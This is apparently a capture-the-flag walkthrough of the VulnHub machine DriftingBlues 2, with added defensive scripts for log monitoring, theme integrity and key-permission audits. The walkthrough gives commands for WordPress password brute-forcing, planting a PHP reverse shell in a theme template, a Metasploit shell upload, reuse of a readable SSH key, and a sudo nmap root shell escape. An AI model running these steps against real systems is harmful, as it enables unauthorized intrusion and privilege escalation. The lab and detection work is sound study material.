We will be doing driftingblues2 challenge from vulnhub in this post. Please check this link for the walkthrough of driftingblues 1.
fping -aqg 10.0.2.0/24
ports=$(nmap -p- --min-rate=1000 -T4 10.0.2.6 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && nmap -p$ports -sC -sV 10.0.2.6
We find that anonymous FTP is enabled. Let's grab that file first and see what the image is about.
ftp 10.0.2.6 # use anonymous as username and leave password blank
get secret.jpg
exit
The file is stored in the current directory. The following is the image.
gobuster dir -u 10.0.2.6 --wordlist /usr/share/wordlists/dirb/common.txt
When we visit the link gobuster found, we see that it is a WordPress blog.
On hovering over a link in the blog, we see that the hostname for the IP is driftingblues.box, so we add that mapping to our /etc/hosts file.
sudo vi /etc/hosts
When we go through the blog, we don't find any revealing secrets. This leaves us with only one option: brute-forcing the login. For this, we use the wpscan tool and the rockyou.txt wordlist.
wpscan --url http://driftingblues.box/blog --detection-mode aggressive -e --passwords=/home/kali/rockyou.txt
We found the username and password of the WordPress user. Now we have two ways to get a reverse shell: one uses the Metasploit framework, the other manually adds a PHP shell to the theme's PHP files. I will show you both methods.
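The brute force above is loud from the server's side: every guess is a POST to wp-login.php, failed attempts come back as HTTP 200 (the login form again) and the one successful guess as a 302 redirect. The following is an added example of how a defender would spot that in an Apache access log; it is not part of the original walkthrough, and the log lines, IPs and user agent strings are constructed for the example.

```shell
#!/bin/sh
# Constructed sample access-log lines (Apache combined format) that mimic a
# wp-login.php password spray. They are made up for this example.
SAMPLE_LOG=$(cat <<'EOF'
10.0.2.15 - - [01/Jan/2021:10:00:01 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4321 "-" "WPScan v3.8.10"
10.0.2.15 - - [01/Jan/2021:10:00:01 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4321 "-" "WPScan v3.8.10"
10.0.2.15 - - [01/Jan/2021:10:00:02 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4321 "-" "WPScan v3.8.10"
10.0.2.15 - - [01/Jan/2021:10:00:02 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4321 "-" "WPScan v3.8.10"
10.0.2.20 - - [01/Jan/2021:10:00:03 +0000] "GET /blog/ HTTP/1.1" 200 12345 "-" "Mozilla/5.0"
10.0.2.15 - - [01/Jan/2021:10:00:03 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8.10"
10.0.2.20 - - [01/Jan/2021:10:00:09 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
EOF
)

# wp_login_bruteforcers THRESHOLD
# Reads an access log on stdin and prints, per client IP, the number of POSTs
# to wp-login.php when it exceeds THRESHOLD, plus whether any of those POSTs
# got a 302 (WordPress redirects only after a successful login).
wp_login_bruteforcers() {
  threshold="$1"
  awk -v t="$threshold" '
    $6 == "\"POST" && $7 ~ /wp-login\.php/ {
      posts[$1]++
      if ($9 == "302") success[$1] = 1
    }
    END {
      for (ip in posts)
        if (posts[ip] > t)
          printf "%s %d %s\n", ip, posts[ip],
                 (ip in success) ? "login-succeeded" : "no-success"
    }' | sort
}

# Demo run over the constructed log: flags 10.0.2.15 (5 POSTs, one of them
# a 302), while 10.0.2.20 with a single login stays below the threshold.
printf '%s\n' "$SAMPLE_LOG" | wp_login_bruteforcers 3
```

On a real host you would feed it `/var/log/apache2/access.log` and pick the threshold to match normal login volume; an IP that shows up with a high count and `login-succeeded` is the one whose guess worked and is where an incident responder would start.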
Method 1: Injecting php manually
We can log in to WordPress.
We can place the reverse shell in the 404 template, which is a perfect choice for me. You tell me, how often do you land on a 404 page while using a website? Now we copy the PHP reverse shell code, update the IP and port and paste it here.
You can find PHP reverse shells in the Kali Linux and Parrot OS distros or anywhere on the internet. Alternatively, you can generate one using msfvenom or msfconsole.
Now it's time to invoke the 404 page. Before that, we have to listen on the specified port, 4444. Then we edit the URL of a valid post so that it no longer exists.
nc -nlvp 4444
We got the shell.
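The foothold in Method 1 works by editing a theme file through the WordPress admin, so the trace it leaves is a changed PHP file under the theme directory. The following is an added example, not from the original post, of the file-integrity check an administrator could run to catch exactly that: record hashes of the theme's PHP files once, then diff later runs against the baseline. It assumes GNU coreutils (sha256sum) and uses a temporary directory with constructed files in place of a real wp-content/themes tree.

```shell
#!/bin/sh
# theme_hashes DIR
# Prints one "sha256  path" line per PHP file under DIR, sorted by path so
# that two runs can be compared.
theme_hashes() {
  find "$1" -type f -name '*.php' -exec sha256sum {} + | sort -k2
}

# theme_changes DIR BASELINE_FILE
# Reports PHP files under DIR whose hash differs from the baseline captured
# earlier with theme_hashes ("modified") or that were not in it ("added").
theme_changes() {
  theme_hashes "$1" | awk '
    NR == FNR        { base[$2] = $1; next }   # first input: the baseline
    !($2 in base)    { print "added", $2; next }
    base[$2] != $1   { print "modified", $2 }
  ' "$2" -
}

# make_theme_dir
# Builds a constructed stand-in for a theme directory and prints its path.
make_theme_dir() {
  d=$(mktemp -d)
  printf '%s\n' '<?php get_header(); ?>' '<h1>Not found</h1>' > "$d/404.php"
  printf '%s\n' '<?php get_header(); ?>' > "$d/index.php"
  echo "$d"
}

# Demo: take a baseline, simulate an edit to 404.php, and report it.
demo_dir=$(make_theme_dir)
theme_hashes "$demo_dir" > "$demo_dir.baseline"
printf '%s\n' '<?php /* constructed: simulated edit via the theme editor */ ?>' >> "$demo_dir/404.php"
theme_changes "$demo_dir" "$demo_dir.baseline"
rm -rf "$demo_dir" "$demo_dir.baseline"
```

In practice the baseline is taken right after a clean install or update and stored off the web server, and the check runs from cron; a "modified 404.php" that nobody scheduled is the signal that someone used the theme editor the way this walkthrough does. Disabling the editor with `DISALLOW_FILE_EDIT` in wp-config.php removes the path entirely.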
Method 2: Using metasploit module
There is a module for wordpress in metasploit framework which can upload a shell after authenticating.
use exploit/unix/webapp/wp_admin_shell_upload
set username albert
set password s<snip>1
set rhosts 10.0.2.6
set targeturi /blog
run
We got a meterpreter shell. However, we could have set a Linux shell in the payload; that's up to us. We can drop into a Linux shell using the shell -t command in meterpreter.
ls -al /home
cd /home/freddie
ls -al .ssh
As we can see above, there is a private key that is readable by other users. We can open it and copy the content, paste it into a file on our local machine and fix the permissions. I am naming the file id_rsa.
On the local machine:
vi id_rsa # paste the content
chmod 400 id_rsa # read-only permission for the owner
ssh firstname.lastname@example.org -i id_rsa
We got the access to freddie. Let’s open the flag.
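The step above works only because freddie's private key is readable by other users; ssh itself refuses to use a key with those permissions, which is why the copy has to be chmod 400 first. The following is an added example, not part of the original post, of the audit an administrator could run over the home directories to find private keys with group- or world-readable bits before anyone else does. It builds a constructed directory tree with placeholder key files (not real key material) so it runs stand-alone; on a real host you would point it at /home.

```shell
#!/bin/sh
# readable_private_keys DIR
# Prints every file under DIR that (a) is readable by group or others and
# (b) starts with a PEM/OpenSSH "PRIVATE KEY" header. Public keys and
# properly protected (0600/0400) private keys are not reported.
readable_private_keys() {
  find "$1" -type f \( -perm -g=r -o -perm -o=r \) 2>/dev/null |
    while IFS= read -r f; do
      if head -n 1 "$f" | grep -q 'PRIVATE KEY'; then
        printf '%s\n' "$f"
      fi
    done | sort
}

# make_demo_home
# Builds a constructed stand-in for /home with two users and prints its path.
# The key files contain placeholder text, not real keys.
make_demo_home() {
  d=$(mktemp -d)
  mkdir -p "$d/freddie/.ssh" "$d/alice/.ssh"
  for u in freddie alice; do
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
                  'placeholder-not-a-real-key' \
                  '-----END OPENSSH PRIVATE KEY-----' > "$d/$u/.ssh/id_rsa"
    printf '%s\n' 'ssh-rsa AAAA placeholder' > "$d/$u/.ssh/id_rsa.pub"
    chmod 644 "$d/$u/.ssh/id_rsa.pub"   # public keys may be world-readable
  done
  chmod 644 "$d/freddie/.ssh/id_rsa"    # the misconfiguration from the box
  chmod 600 "$d/alice/.ssh/id_rsa"      # correct permissions
  echo "$d"
}

# Demo: only freddie's key should be reported.
demo_home=$(make_demo_home)
readable_private_keys "$demo_home"
rm -rf "$demo_home"
```

The find expression uses POSIX symbolic modes (`-perm -g=r`, `-perm -o=r`), so it runs with either GNU or BusyBox find; the fix for anything it reports is `chmod 600` on the key and `chmod 700` on the .ssh directory.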
Now we have to find a way to get root through nmap, which freddie can run with sudo. Doing some research, I found that nmap in fact has a way to run shell commands, and it differs between two ranges of versions.
nmap --version # gives 7.70
Therefore, we use the nmap 7.70 method to get a root shell.
TF=$(mktemp)
echo 'os.execute("/bin/bash -i")' > $TF
sudo nmap --script=$TF
We got the root shell. However, we cannot see what we type. To fix that, type reset and press enter. Now it's time to get the flag.
reset
cd /root
ls -al
cat root.txt
This box is quite easy. For me, the only thing that took some time was getting the foothold, because I generally don't go for brute-forcing.